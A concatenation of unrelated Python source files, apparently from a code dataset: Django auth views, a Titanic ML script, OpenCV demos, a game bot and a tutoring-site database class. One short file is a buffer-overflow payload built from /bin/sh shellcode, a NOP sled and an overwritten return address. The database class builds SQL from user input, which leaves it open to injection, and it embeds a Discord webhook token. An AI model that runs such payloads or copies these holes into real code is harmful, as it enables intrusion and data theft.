if request.method == 'POST':
login_form = LoginForm(request.POST)
if login_form.is_valid():
username = request.POST['username']
password = request.POST['password']
user = authenticate(username=username, password=password)
if user is not None:
login(request, user)
render(request, 'index.html', { 'login_form': login_form,
'artical_latest': artical_latest,
})
else:
render(request, 'index.html', { 'login_form': login_form,
'artical_latest': artical_latest,
})
else:
login_form = LoginForm()
context = { 'login_form' : login_form, 'artical_latest': artical_latest }
return render(request,'index.html', context)
def log_in(request):
if request.method == 'POST':
login_form = LoginForm(request.POST)
if login_form.is_valid():
username = request.POST['username']
password = request.POST['password']
user = authenticate(username=username, password=password)
if user is not None:
login(request, user)
url = request.POST.get('source_url', '/foucs/')
return redirect(url)
else:
render(request, 'log_in.html', { 'login_form': login_form})
else:
login_form = LoginForm()
return render(request,'log_in.html',{'login_form': login_form})
def artical_detail(request, artical_id):
try:
artical = Artical.objects.get(pk=artical_id)
except Artical.DoesNotExit:
raise Http404('Artical does not exit!')
content = markdown2.markdown(artical.content, extras=["code-friendly", "fenced-code-blocks", "header-ids", "toc", "metadata"])
comments = Comment.objects.filter(artical=artical_id)
comment_form = CommentForm()
if request.method == 'POST':
login_form = LoginForm(request.POST)
if login_form.is_valid():
username = request.POST['username']
password = request.POST['password']
user = authenticate(username=username, password=password)
if user is not None:
login(request, user)
render(request, 'artical_detail.html', {'artical': artical,
'content': content,
'comments': comments,
'comment_form': comment_form,
'login_form': login_form,
})
else:
render(request, 'artical_detail.html', { 'login_form': login_form,
'artical': artical,
'content': content,
'comments': comments,
'comment_form': comment_form,
})
else:
login_form = LoginForm()
context = { 'artical': artical,
'content': content,
'comments': comments,
'comment_form': comment_form,
'login_form': login_form,
}
return render(request,'artical_detail.html',context)
@login_required(login_url='/foucs/log_in')
def comment(request, artical_id):
comment_form = CommentForm(request.POST)
if comment_form.is_valid():
user = request.user
artical = Artical.objects.get(pk=artical_id)
new_comment = comment_form.cleaned_data['content']
artical.comment_nums += 1
comment_a = Comment(comment_text=new_comment, artical = artical, user=user)
comment_a.save()
url = urljoin('/foucs/artical/', artical_id)
return redirect(url)
@login_required(login_url='/foucs/log_in')
def poll_artical_indetail(request, artical_id):
logged_user = request.user
artical = Artical.objects.get(pk=artical_id)
articals = []
polls = logged_user.poll_set.all()
url = urljoin('/foucs/artical/', artical_id)
for poll in polls:
articals.append(poll.artical)
if artical in articals:
return redirect(url)
else:
artical.poll_nums += 1
artical.save()
poll_a = Poll(user=logged_user, artical=artical)
poll_a.save()
return redirect(url)
def log_up(request):
if request.method == 'POST':
logup_form = LogupForm(request.POST)
if logup_form.is_valid():
email = logup_form.cleaned_data['email']
username = request.POST['username']
password = request.POST['password']
if not User.objects.filter(email = email):
user = User.objects.create_user(username=username, password=password, email=email)
user.save()
return render_to_response('logup_succeed.html',{'username': user.username})
else:
render(request, 'log_up.html', {'logup_form': logup_form})
else:
logup_form = LogupForm()
context = {'logup_form': logup_form}
return render(request, 'log_up.html', context)
#登出,即使用户未登陆也不会报错
@login_required
def log_out(request):
logout(request)
url = request.POST.get('source_url', '/foucs/')
return HttpResponseRedirect(url)
|
991,238 | 93ed55d989436d902cefb258b4ada4b4fcfcc860 | #!/usr/bin/env python
shellcode = "\x83\xec\x7f\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
nopsled = "\x90"*(80 - len(shellcode))
eip = "\xba\xf7\xff\xbf"
payload = nopsled + shellcode + eip
print payload |
991,239 | efdc34dda06c9e07d1b8ad7ad375f20ac613dc40 | import json
data = {
'no': 1,
'name': 'Runoob',
'url': 'http://www.runoob.com'
}
json_str = json.dumps(data)
print(json_str)
python_dic = json.loads(json_str)
print(python_dic)
# 读取文件中的数据
with open('json_example.json', 'r', encoding='utf-8') as file:
data1 = json.load(file)
print(data1.__class__)
# 将数据写入文件
# with open('json_example.json', 'w', encoding='utf-8') as file:
# data1 = json.dump(data1, file)
# print(data1)
|
991,240 | 00d5fd442023cdaf05cde33110975438da58035f | class Solution:
def isArmstrong(self, N: int) -> bool:
k = len(str(N))
sum = 0
for ch in str(N):
sum += int(ch) ** k
if sum == N:
return True
return False
|
991,241 | 6499ed0532ca13f7a5383d101707541d3938506a |
import numpy as np
import pandas as pd
train = pd.read_csv("train.csv", dtype={"Age": np.float64}, )
test = pd.read_csv("test.csv", dtype={"Age": np.float64}, )
train.head(10)
train_corr = train.corr()
train_corr
def correct_data(train_data, test_data):
# Make missing values for training data from test data as well
train_data.Age = train_data.Age.fillna(test_data.Age.median())
train_data.Fare = train_data.Fare.fillna(test_data.Fare.median())
test_data.Age = test_data.Age.fillna(test_data.Age.median())
test_data.Fare = test_data.Fare.fillna(test_data.Fare.median())
train_data = correct_data_common(train_data)
test_data = correct_data_common(test_data)
return train_data, test_data
def correct_data_common(titanic_data):
titanic_data.Sex = titanic_data.Sex.replace(['male', 'female'], [0, 1])
titanic_data.Embarked = titanic_data.Embarked.fillna("S")
titanic_data.Embarked = titanic_data.Embarked.replace(['C', 'S', 'Q'], [0, 1, 2])
return titanic_data
train_data, test_data = correct_data(train, test)
train_corr = train.corr()
train_corr
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC, LinearSVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.model_selection import cross_val_score
parameters = {
'n_estimators' : [5, 10, 20, 30],
'max_depth' : [3, 5, 8],
'random_state' : [0],
}
predictors = ["Pclass", "Sex", "Age", "Parch", "Fare", "Embarked"]
models = []
models.append(("GradientBoosting", GradientBoostingClassifier(n_estimators=26)))
models.append(("LogisticRegression",LogisticRegression()))
models.append(("SVC",SVC()))
models.append(("LinearSVC",LinearSVC()))
models.append(("KNeighbors",KNeighborsClassifier()))
models.append(("DecisionTree",DecisionTreeClassifier()))
models.append(("RandomForest",GridSearchCV(RandomForestClassifier(), parameters)))
models.append(("MLPClassifier",MLPClassifier(solver='lbfgs', random_state=0)))
results = []
names = []
for name,model in models:
result = cross_val_score(model, train_data[predictors], train_data["Survived"], cv=3)
names.append(name)
results.append(result)
for i in range(len(names)):
print(names[i],results[i].mean())
##------------------------------
alg = RandomForestClassifier()
alg.fit(train_data[predictors], train_data["Survived"])
predictions = alg.predict(test_data[predictors])
submission = pd.DataFrame({
"PassengerId": test_data["PassengerId"],
"Survived": predictions
})
submission.to_csv('submission.csv', index=False)
|
991,242 | 24ff0619b75fc39f04a2b1c14d68dcb381c838bc | import cv2
import numpy as np
import matplotlib.pyplot as plt
cv2.namedWindow("Camera", cv2.WINDOW_KEEPRATIO)
cam = cv2.VideoCapture(0)
if not cam.isOpened():
raise RuntimeError("Camera broken")
cascade = cv2.CascadeClassifier(
'lectures\src\haarcascade_frontalface_default.xml')
while cam.isOpened():
ret, frame = cam.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = cascade.detectMultiScale(gray, 1.3, 5)
for (x, y, w, h) in faces:
cv2.rectangle(frame, (x, y), (x+w, y+h), (255, 0, 0), 2)
cv2.imshow("Camera", frame)
key = cv2.waitKey(1)
if key == ord('p'):
cv2.imwrite(
"D:\_Progromouse\computer-vision\lectures\screen.png", frame)
if key == ord('q'):
break
cam.release()
cv2.destroyAllWindows()
|
991,243 | e01663632cd8b45d5dc40b1162b2fbae376c7e72 | import cv2
import numpy as np
img = cv2.imread('download.jpeg')
ret, threshold = cv2.threshold(img, 12, 255, cv2.THRESH_BINARY)
im2gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
ret, threshold = cv2.threshold(im2gray, 10, 255, cv2.THRESH_BINARY)
adaptive_threshold = cv2.adaptiveThreshold(im2gray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C,
cv2.THRESH_BINARY, 115, 1)
cv2.imshow('original', img)
cv2.imshow('threshold', threshold)
cv2.imshow('adaptive', adaptive_threshold)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
991,244 | 1ce852870bdefbb37b32284437c62122f2aedd69 | celsius = input('please input temperature in Celsius: ')
fahrenheit = float(celsius) * 9 / 5 + 32
kelvin = float(celsius) + 273.15
print('degree in fahrenheit: ', fahrenheit)
print('degree in kelvin: ', kelvin)
def temperature_function(celsius):
fahrenheit = float(celsius) * 9 / 5 + 32
kelvin = float(celsius) + 273.15
print('degree in fahrenheit: ', fahrenheit)
print('degree in kelvin: ', kelvin) |
991,245 | a9fe2d46638f0e2327b8b4ae6a7bdc64b7028c44 | #!/usr/bin/env python
# vim: set ts=2 sw=2 expandtab:
import game
from optparse import OptionParser
import sys
import random
def main():
parser = OptionParser()
parser.add_option("-U", "--username", dest="username",
help="username of login")
parser.add_option("-P", "--password", dest="password",
help="password for login")
parser.add_option("-n", "--noupgrade", dest="doupgrade",
action="store_false", default=True, help="dry run")
parser.add_option("-b", "--military", dest="military",
action="store_true", default=False, help="build military base")
parser.add_option("-m", "--mindcontrol", dest="mindcontrol",
action="store_true", default=False, help="build mind control")
parser.add_option("-d", "--defense", dest="defense",
action="store_true", default=False, help="build planetary defense")
parser.add_option("--dp", "--defensepercent", dest="defensepercent",
action="store", default=30, type="int", help="ratio of defense to military bases")
parser.add_option("-t", "--tax", dest="tax", type="float",
action="store", help="set tax rate")
parser.add_option("-r", "--trade", dest="allowtrade", default=False,
action="store_true", help="set allow trade")
(options, args) = parser.parse_args()
print options
g=game.Galaxy()
if options.username and options.password:
# explicit login
g.login(options.username, options.password, force=True)
else:
# try to pick up stored credentials
g.login()
BuildUpgrades(g, options.doupgrade, options.mindcontrol, options.defense,
options.military, options.tax, options.allowtrade, options.defensepercent)
g.write_planet_cache()
def BuildUpgrade(p, doupgrade, upgrade):
total = 0
if doupgrade:
if p.start_upgrade(upgrade):
print "\tbuilt %s at %s." % (upgrade, p.name)
total += 1
else:
print "\tfailed to build %s at %s." % (upgrade, p.name)
else:
print "\twould have built %s at %s." % (upgrade, p.name)
return total
def BuildUpgrades(g, doupgrade, domindcontrol, dodefense, domilitary, tax, allowtrade, defensepercent=30):
has_pd = []
total = 0
for p in g.planets:
p.load()
print "looking at planet " + p.name
if tax != None:
if p.tax < float(tax):
print "\tsetting tax rate to " + str(tax)
if doupgrade:
p.set_tax(tax)
if allowtrade:
if p.allowtrade != True:
print "\tenabling trade"
if doupgrade:
p.allow_trade()
# ratio to skew the upgrades based on what the actual tax rate is relative to 7%
taxconstant = 7 / p.tax
#print taxconstant
# min upgrades assuming 7% tax
#if p.can_upgrade('Antimatter Power Plant'):
# total += BuildUpgrade(p, doupgrade, 'Antimatter Power Plant')
if p.can_upgrade('Trade Incentives') and p.population >= 5000 * taxconstant:
total += BuildUpgrade(p, doupgrade, 'Trade Incentives')
if p.society > 10 and p.can_upgrade('Long Range Sensors 1') and p.population >= 50000 * taxconstant:
total += BuildUpgrade(p, doupgrade, 'Long Range Sensors 1')
if p.society > 20 and p.can_upgrade('Long Range Sensors 2') and p.population >= 150000 * taxconstant:
total += BuildUpgrade(p, doupgrade, 'Long Range Sensors 2')
if p.society > 40 and p.can_upgrade('Matter Synth 1') and p.population >= 400000 * taxconstant:
total += BuildUpgrade(p, doupgrade, 'Matter Synth 1')
if p.society > 50 and p.can_upgrade('Petrochemical Power Plant') and p.population >= 500000 * taxconstant:
total += BuildUpgrade(p, doupgrade, 'Petrochemical Power Plant')
if p.society > 50 and p.can_upgrade('Matter Synth 2') and p.population >= 900000 * taxconstant:
total += BuildUpgrade(p, doupgrade, 'Matter Synth 2')
if p.society > 50 and p.can_upgrade('Slingshot') and p.population >= 1500000 * taxconstant:
total += BuildUpgrade(p, doupgrade, 'Slingshot')
if domindcontrol and p.can_upgrade('Mind Control'):
if p.society < 90 and p.society >= 75: # mind control at 80
total += BuildUpgrade(p, doupgrade, 'Mind Control')
# deal with military and defense
# if both mil and defense are selected, try to randomly decide between the two
if domilitary and dodefense:
# try to distribute defense and military semi-randomly
if p.society > 50 and p.population >= 5000000 * taxconstant:
if p.can_upgrade('Military Base') and p.can_upgrade('Planetary Defense 1'):
# this planet can either go military or defense
print "planet %s can go either military or defense" % p
# decide randomly
# 30% (defensepercent) will go defense
if random.randrange(0, 100) < defensepercent:
total += BuildUpgrade(p, doupgrade, 'Planetary Defense 1')
else:
total += BuildUpgrade(p, doupgrade, 'Military Base')
if p.has_upgrade('Military Base') and p.has_upgrade('Planetary Defense 1') and not p.has_upgrade('Regional Government'):
print "WARNING: planet %s has both PD and MB, probably can't afford it" % str(p)
# XXX special case, leave disabled
#if p.has_upgrade('Planetary Defense 1') and not p.has_upgrade('Regional Government'):
#print "planet %s should get PD reevaluated" % str(p)
#if random.randrange(0, 100) >= int(defensepercent):
#print "switching planet %s to base from defense" % str(p)
#if doupgrade:
#p.scrap_upgrade('Planetary Defense 1')
#total += BuildUpgrade(p, doupgrade, 'Military Base')
else:
if domilitary and p.society > 50 and p.can_upgrade('Military Base') and p.population >= 5000000 * taxconstant:
total += BuildUpgrade(p, doupgrade, 'Military Base')
if dodefense and p.can_upgrade('Planetary Defense 1') and p.population >= 5000000 * taxconstant:
total += BuildUpgrade(p, doupgrade, 'Planetary Defense 1')
print "started %d upgrades" % total
if __name__ == "__main__":
main()
|
991,246 | b5df8ffe4028c127f66a2af7d960f6dd791f90e9 | name = input('请输入你的名字: ')
print('wellcome,',name)
print("1024 * 768 =",1024*768)
print('''line1
line2
line3''')
# r表示内部字符串不转义
print(r'''hello,\n
world''') |
991,247 | c29167472c1b2cf03d2337e95724aa428408e9ef | import json
import random
import re
import string
import threading
from datetime import datetime
import psycopg2
import requests
import email_verification
import general_settings
import validater
rand = lambda len: ''.join(
random.SystemRandom().choice(string.ascii_lowercase + string.ascii_uppercase + string.digits) for _ in
range(len)).upper()
class DB:
def __init__(self):
self.gSet = general_settings.Settings()
self.host = self.gSet.host
self.port = self.gSet.port
self.user = self.gSet.user
self.pw = self.gSet.pw
self.db = self.gSet.db
self.conn = None
self.cursor = None
self.logfile = "logs/db/%s.txt"
self.connDict = {}
self.curDict = {}
self.getConn()
def send_email(self, email, title, message):
threading.Thread(target=email_verification._send_notify, args=(email, title, message,)).start()
def _send_webhook(self, title, content, user, url, ip, colour=3447003):
data = {
"username": "온풀 웹서비스",
"avatar_url": "",
"tts": False,
"content": "",
"author": {
"name": "",
"icon_url": "",
},
"embeds": [
{
"color": colour,
"title": "{}".format(title),
"description": "{}".format(content),
"url": "http://onpool.kr",
"fields": [
{"name": "/ {} /".format(user), "value": "URL: {}\nIP: {}\nTIME:{}".format(url, ip,
datetime.now().strftime(
"%Y-%m-%d_%H:%M:%S")),
"inline": False},
],
"footer": {
'text': "ⓒ 이은학 (이은학#9299) \\ Github @R3turn0927 \\ KakaoTalk @bc1916"
}
}
]
}
return requests.post(
"https://discordapp.com/api/webhooks/400916071290372106/_BGMidyEj35vyLBzBQ2k-ILjBrVCVJDtpHBA940EznQDjO-eIqlTxhNEpNVkBGgoSILH",
data=json.dumps(data), headers={"Content-type": "multipart/form-data"}).text
def hardfilter(self, string, r=re.compile("[a-zA-Z0-9]{1,}")):
print(string)
res = r.match(string)
if res is None: return False
if string == res.group(): return True
return False
def getConn(self):
self.conn = psycopg2.connect(
host=self.host,
port=self.port,
user=self.user,
password=self.pw,
database=self.db
)
self.conn.autocommit = True
return self.conn
def writeLog(self, _ip, query):
open(self.logfile % datetime.now().strftime("%Y-%m-%d"), "a", encoding="UTF-8") \
.write("%s\t%s\t%s\n" % (datetime.now().strftime("%Y-%m-%d_%H:%M:%S"), _ip, query))
def getCursor(self):
thread_id = threading.get_ident().__int__()
if not thread_id in self.connDict.keys():
self.connDict[thread_id] = self.getConn()
if thread_id not in self.curDict.keys():
self.curDict[thread_id] = self.connDict[thread_id].cursor()
return self.curDict[thread_id]
def checkIDExist(self, id, _ip):
if not self.hardfilter(id): return True
cur = self.getCursor()
query = 'SELECT "id" FROM users WHERE id=\'%s\'' % id
self.writeLog(_ip, query)
cur.execute(query)
_data = cur.fetchall()
return _data
def checkEmailExist(self, email, _ip):
err, _ = validater.email(email)
if err: return True
cur = self.getCursor()
query = 'SELECT "email" FROM users WHERE email=\'%s\'' % email
self.writeLog(_ip, query)
cur.execute(query)
_data = cur.fetchall()
return _data
def addUser(self, _id, _pw, _name, _bir, _gra, _email, _ip, _code, _org):
if not self.hardfilter(_id): return "Invalid Query"
if validater.email(_email)[0]: return "Invalid Query"
cur = self.getCursor()
try:
cur.execute('INSERT INTO users (id,pw,name,grade,birthday,email,email_verified,registered_ip,recent_ip,organization) VALUES(\'%s\',\'%s\',\'%s\',\'%s\',\'%s\',\'%s\',\'%s\',\'%s\',\'%s\',\'%s\')' % (
_id, _pw, _name, _gra, _bir, _email, _code, _ip, _ip, _org))
self.conn.commit()
return False
except Exception as ex:
return str(ex)
def verifyCode(self, code, ip):
cur = self.getCursor()
try:
query = 'SELECT \'T\' FROM users WHERE email_verified=\'{}\';'.format(code)
self.writeLog(ip, query)
cur.execute(query)
ret = len(cur.fetchall())
if ret:
query = 'UPDATE users SET email_verified = \'VERIFIED\' WHERE email_verified=\'{}\';'.format(code)
self.writeLog(ip, query)
cur.execute(query)
return [False, True]
else:
return [False, False]
except Exception as ex:
return [True, str(ex)]
def submitRecentIP(self, _id, _ip):
cur = self.getCursor()
try:
query = 'UPDATE users SET recent_ip = \'%s\' WHERE id = \'%s\';' % (_ip, _id)
self.writeLog(_ip, query)
cur.execute(query)
self.conn.commit()
return False
except Exception as ex:
return str(ex)
# TODO: Regex Check [a-zA-Z0-9]{1,}
def getAccount(self, _id, _pw, _ip):
if not self.hardfilter(_id): return [True, "Invalid Query"]
cur = self.getCursor()
try:
query = 'SELECT name, email_verified FROM users WHERE id=\'%s\' and pw=\'%s\'' % (_id, _pw)
self.writeLog(_ip, query)
cur.execute(query)
result = cur.fetchall()
print(result)
return [False, result]
except Exception as ex:
return [True, str(ex)]
def getUserCode(self, id, ip):
cur = self.getCursor()
try:
query = 'SELECT email, email_verified FROM users WHERE id=\'{}\';'.format(id)
self.writeLog(ip, query)
cur.execute(query)
result = cur.fetchall()
return [False, result[0]]
except Exception as ex:
return [True, str(ex)]
def getUserOrg(self, id):
cur = self.getCursor()
try:
query = 'SELECT organization FROM users WHERE id=\'{}\';'.format(id)
self.writeLog("LOCAL", query)
cur.execute(query)
result = cur.fetchall()
return [False, result[0][0]]
except Exception as ex:
return [True, str(ex)]
def getUserGrade(self, id):
cur = self.getCursor()
try:
query = 'SELECT grade FROM users WHERE id=\'{}\';'.format(id)
self.writeLog("LOCAL", query)
cur.execute(query)
result = cur.fetchall()
return [False, result[0][0]]
except Exception as ex:
return [True, str(ex)]
def getBookSeries(self, ip, selection="*"):
cur = self.getCursor()
try:
query = 'SELECT name FROM bookseries WHERE serviced=TRUE ;'
self.writeLog(ip, query)
cur.execute(query)
result = cur.fetchall()
return [False, sorted(result)]
except Exception as ex:
return [True, str(ex)]
def getSubjId(self, subj, ip):
cur = self.getCursor()
try:
query = 'SELECT id FROM curriculum WHERE name=\'{}\';'.format(subj)
self.writeLog(ip, query)
cur.execute(query)
result = cur.fetchall()[0]
return [False, result]
except Exception as ex:
print(ex)
return [True, str(ex)]
def getSub(self, subjid):
cur = self.getCursor()
try:
query = 'SELECT name FROM curriculum WHERE id=\'{}\';'.format(subjid)
# self.writeLog("LOCAL", query)
cur.execute(query)
result = cur.fetchall()
return [False, result[0][0]]
except Exception as ex:
print(ex)
return [True, str(ex)]
def getInfo(self, subj, book, ip):
cur = self.getCursor()
try:
query = 'SELECT year, chapter_indication FROM book WHERE bookname=\'{1}\' AND curr_id=\'{0}\';'.format(subj, book)
self.writeLog(ip, query)
cur.execute(query)
result = cur.fetchall()
return [False, result]
except Exception as ex:
print(ex)
return [True, str(ex)]
def getBook(self, subj, book, year):
cur = self.getCursor()
try:
query = 'SELECT book_id FROM book WHERE bookname=\'{1}\' AND curr_id=\'{0}\' AND year=\'{2}\';'.format(subj,
book,
year)
# self.writeLog("LOCAL", query)
cur.execute(query)
result = cur.fetchall()
return [False, result[0][0]]
except Exception as ex:
print(ex)
return [True, str(ex)]
def getBookMessage(self, book):
cur = self.getCursor()
try:
query = 'SELECT message FROM bookseries WHERE name=\'{}\';'.format(book)
# self.writeLog("LOCAL", query)
cur.execute(query)
result = cur.fetchall()
return [False, result[0][0]]
except Exception as ex:
print(ex)
return [True, str(ex)]
def getBookInfo(self, bid):
cur = self.getCursor()
try:
query = 'SELECT curr_id, bookname, year FROM book WHERE book_id=\'{}\';'.format(bid)
# self.writeLog("LOCAL", query)
cur.execute(query)
result = cur.fetchall()
return [False, result[0]]
except Exception as ex:
print(ex)
return [True, str(ex)]
# --- beta ---
def checkBetaCode(self, code, ip):
cur = self.getCursor()
try:
query = "SELECT code FROM codes WHERE allowed=1;"
self.writeLog(ip, query)
cur.execute(query)
result = cur.fetchall()
result = [x[0] for x in result]
if code not in result: return False
query = "UPDATE codes SET allowed = 0 WHERE code='{}';".format(code)
self.writeLog(ip, query)
cur.execute(query)
return True
except Exception as ex:
return False
def getProblemId(self, book_id, page, number):
cur = self.getCursor()
try:
query = 'SELECT problem_id FROM problem WHERE book_id=\'{}\' AND page=\'{}\' AND number=\'{}\';'.format(
book_id, page, number)
# self.writeLog("LOCAL", query)
cur.execute(query)
result = cur.fetchall()
if len(result):
return [False, result[0][0]]
else:
return [False, False]
except Exception as ex:
raise ex
print(ex)
return [True, str(ex)]
def getProblemInfo(self, pid):
cur = self.getCursor()
try:
query = 'SELECT book_id, page, number FROM problem WHERE problem_id=\'{}\';'.format(pid)
# self.writeLog("LOCAL", query)
cur.execute(query)
result = cur.fetchall()
if len(result):
return [False, result[0]]
else:
return [False, False]
except Exception as ex:
raise ex
print(ex)
return [True, str(ex)]
# --- Functional Features ---
def getVideo(self, pid):
cur = self.getCursor()
try:
query = 'SELECT url FROM solution_video WHERE problem_id=\'{}\';'.format(pid)
# self.writeLog("LOCAL", query)
cur.execute(query)
result = cur.fetchall()
if len(result):
return [False, result[0][0]]
else:
return [False, False]
except Exception as ex:
raise ex
print(ex)
return [True, str(ex)]
def videoHit(self, url):
cur = self.getCursor()
try:
query = 'UPDATE solution_video SET hit=hit+1 WHERE url=\'{}\';'.format(url)
# self.writeLog("LOCAL", query)
cur.execute(query)
self.writeLog("LOCAL", query)
return [False, None]
except Exception as ex:
#raise ex
return [True, str(ex)]
def checkDuplicated(self, pid, requester):
cur = self.getCursor()
try:
query = 'SELECT status FROM question WHERE student_id=\'{}\' and problem_id=\'{}\';'.format(requester, pid)
cur.execute(query)
result = cur.fetchall()
return [False, len(result)]
except Exception as ex:
raise ex
print(ex)
return [True, str(ex)]
def submitmyQuestion(self, _requester, subj, bookseries, year, page, no, ip):
cur = self.getCursor()
try:
duplicated = False
err, bookid = self.getBook(subj, bookseries, year)
if err: raise Exception(bookid)
err, pid = self.getProblemId(book_id=bookid, page=page, number=no)
if err: raise Exception(pid)
if pid:
print("Already Uploaded Question-Problem")
err, ret = self.checkDuplicated(pid, _requester)
if err:
pass
elif ret:
duplicated = True
else:
print("Adding New Question-Problem")
query = 'INSERT INTO problem (book_id, page, number) VALUES ({}, \'{}\', {}) RETURNING problem_id;'.format(
bookid, page, no)
self.writeLog(ip, query)
cur.execute(query)
pid = cur.fetchall()[0][0]
query = 'INSERT INTO question (problem_id, student_id) VALUES ({}, \'{}\') RETURNING question_id;'.format(
pid, _requester)
self.writeLog(ip, query)
cur.execute(query)
qid = cur.fetchall()[0][0]
err, data = self.getVideo(pid)
self._send_webhook("질문등록",
"Problem: {}\nQuestionID:{}\n교재번호: {}\n페이지(챕터): {}\n문항번호: {}\n신청자: {}\n\n새로운 질문이 접수되었습니다."
.format(pid, qid, bookid, page, no, _requester),
_requester, "DB.submitmyQuestion", ip
)
if err:
pass
else:
if data is False:
pass
else:
query = 'UPDATE question SET status = 1, message = \'자동답변\', p_time = current_date, p_time_ = now() WHERE question_id=\'{}\';'.format(
qid)
self.writeLog("AUTOMATION", query)
cur.execute(query)
if not duplicated:
query = 'UPDATE users SET point = point - {} WHERE id=\'{}\';'.format(self.gSet.question_cost,
_requester)
self.writeLog(ip, query)
cur.execute(query)
self._send_webhook("자동답변",
"ProblemID: {}\nQuestionID: {}\n\n에 대한 해설영상이 자동으로 등록되었습니다.".format(pid, qid),
_requester, "DB.submitmyQuestion", ip, colour=10539945)
if duplicated:
return [False, "중복질문으로 인해 포인트 차감없이 질문이 등록되었습니다."]
else:
return [False, "질문이 등록되었습니다."]
except Exception as ex:
raise ex
return [True, str(ex)]
# --- MyPage ---
def getMyQuestion(self, User, ip, timestr="to_date('19700101','YYYYMMDD')"):
cur = self.getCursor()
try:
query = 'SELECT problem_id, TO_CHAR(q_time, \'YYYY-MM-DD\'), status, message FROM question WHERE student_id=\'{}\' AND q_time >= {} ORDER BY question_id;'.format(
User['id'], timestr)
self.writeLog(ip, query)
cur.execute(query)
result = cur.fetchall()
result.reverse()
return [False, result]
except Exception as ex:
print(ex)
return [True, str(ex)]
def getMyLastestQuestion(self, User, ip):
cur = self.getCursor()
try:
query = 'SELECT curr_id, bookname, year FROM book WHERE book.book_id=(SELECT book_id FROM problem WHERE problem.problem_id=(SELECT problem_id FROM question WHERE student_id=\'{}\' ORDER BY question_id DESC LIMIT 1));'.format(User['id'])
self.writeLog(ip, query)
cur.execute(query)
result = cur.fetchall()
return [False, result[0]]
except Exception as ex:
return [True, str(ex)]
def getMyQuestionTodayCount(self, User, ip, timestr="current_date"):
cur = self.getCursor()
try:
query = 'SELECT count(problem_id) FROM question WHERE student_id=\'{}\' AND q_time >= {}'.format(User['id'],
timestr)
self.writeLog(ip, query)
cur.execute(query)
result = cur.fetchall()[0][0]
return [False, result]
except Exception as ex:
print(ex)
return [True, str(ex)]
def get_point(self, user, ip):
cur = self.getCursor()
try:
query = 'SELECT point FROM users WHERE id=\'{}\';'.format(user)
self.writeLog(ip, query)
cur.execute(query)
result = cur.fetchall()
return [False, result[0]]
except Exception as ex:
print(ex)
return [True, str(ex)]
def getMyDayRateLimit(self, User, ip):
cur = self.getCursor()
try:
query = 'SELECT daily_limit FROM users WHERE id=\'{}\';'.format(User['id'])
self.writeLog(ip, query)
cur.execute(query)
result = cur.fetchall()
return [False, result[0][0]]
except Exception as ex:
print(ex)
return [True, str(ex)]
# --- Admin Panel ---
def getAllQuestions(self, limit=20):
cur = self.getCursor()
try:
print(limit)
query = 'SELECT question_id, problem_id, student_id,TO_CHAR(q_time, \'YYYY-MM-DD\'), q_time_, status, message FROM question ORDER BY question_id DESC LIMIT {};'.format(
limit)
self.writeLog("ADMIN", query)
cur.execute(query)
result = cur.fetchall()
return [False, result]
except Exception as ex:
print(ex)
return [True, str(ex)]
def getAllVideos(self, limit=20):
cur = self.getCursor()
try:
print(limit)
query = 'SELECT problem_id, url, tutor, hit FROM solution_video ORDER BY problem_id;-- LIMIT={};'.format(
limit)
self.writeLog("ADMIN", query)
cur.execute(query)
result = cur.fetchall()
return [False, result]
except Exception as ex:
print(ex)
return [True, str(ex)]
def getAllProblems(self, limit=20):
cur = self.getCursor()
try:
print(limit)
query = 'SELECT problem_id, book_id, page, number FROM problem ORDER BY problem_id;-- LIMIT={};'.format(
limit)
self.writeLog("ADMIN", query)
cur.execute(query)
result = cur.fetchall()
return [False, result]
except Exception as ex:
print(ex)
return [True, str(ex)]
def insertVideo(self, id, vid, pid, nick, ip):
cur = self.getCursor()
try:
query = 'INSERT INTO solution_video VALUES (\'{}\',\'/video/flowplayer/play?vid={}\',\'{}\',0);'.format(pid,
vid,
id)
self.writeLog("ADMIN", query)
cur.execute(query)
self._send_webhook("영상 등록",
"ProblemID: {}\nVideo Hash: {}\nUploader:{}\n\n새로운 영상이 업로드되었습니다.".format(pid, vid, id),
"{}".format(nick), "DB.insertVideo", ip, colour=3092790)
return [False, None]
except Exception as ex:
print(ex)
return [True, str(ex)]
def updateStatus(self, pid):
cur = self.getCursor()
try:
query = 'UPDATE question SET status=1, message=\'지연답변\', p_time = current_date, p_time_ = now() WHERE problem_id={} RETURNING (SELECT email FROM users WHERE id=question.student_id);;'.format(
pid)
self.writeLog("ADMIN", query)
cur.execute(query)
emails = [x[0] for x in cur.fetchall()]
for email in emails:
self.send_email(email, "회원님의 질문에 대한 영상이 준비되었습니다.", """
<p>회원님의 질문에 대한 해설영상이 방금 업로드되었습니다.</p>
<br />
<a target='_blank' href='http://onpool.kr/'>온풀 방문하기</a>""")
return [False, None]
except Exception as ex:
print(ex)
return [True, str(ex)]
def makeProblem(self, subj, bookseries, year, page, no):
cur = self.getCursor()
try:
err, bookid = self.getBook(subj, bookseries, year)
if err: raise Exception("Error on Making Problem with bookid err: {}".format(bookid))
print("Adding New Question-Problem")
query = 'INSERT INTO problem (book_id, page, number) VALUES ({}, \'{}\', {}) RETURNING problem_id;'.format(
bookid, page, no)
self.writeLog("ADMIN", query)
cur.execute(query)
pid = cur.fetchall()[0][0]
return [False, pid]
except Exception as ex:
return [True, str(ex)]
def updateQuestionMessage(self, qid, msg, nick, ip):
cur = self.getCursor()
try:
query = 'UPDATE question SET message = \'{}\' WHERE question_id = \'{}\';'.format(msg, qid)
self.writeLog("ADMIN", query)
cur.execute(query)
self._send_webhook("질문 문구수정",
"QuestionID: {}\nNewMessage:{}\n\n관리자에 의해 질문의 상태메세지가 수정되었습니다.".format(qid, msg),
"{}".format(nick), "DB.updateQuestionMessage", ip, colour=3092790)
return [False, None]
except Exception as ex:
return [True, str(ex)]
def markQuestion(self, qid, nick, ip):
cur = self.getCursor()
try:
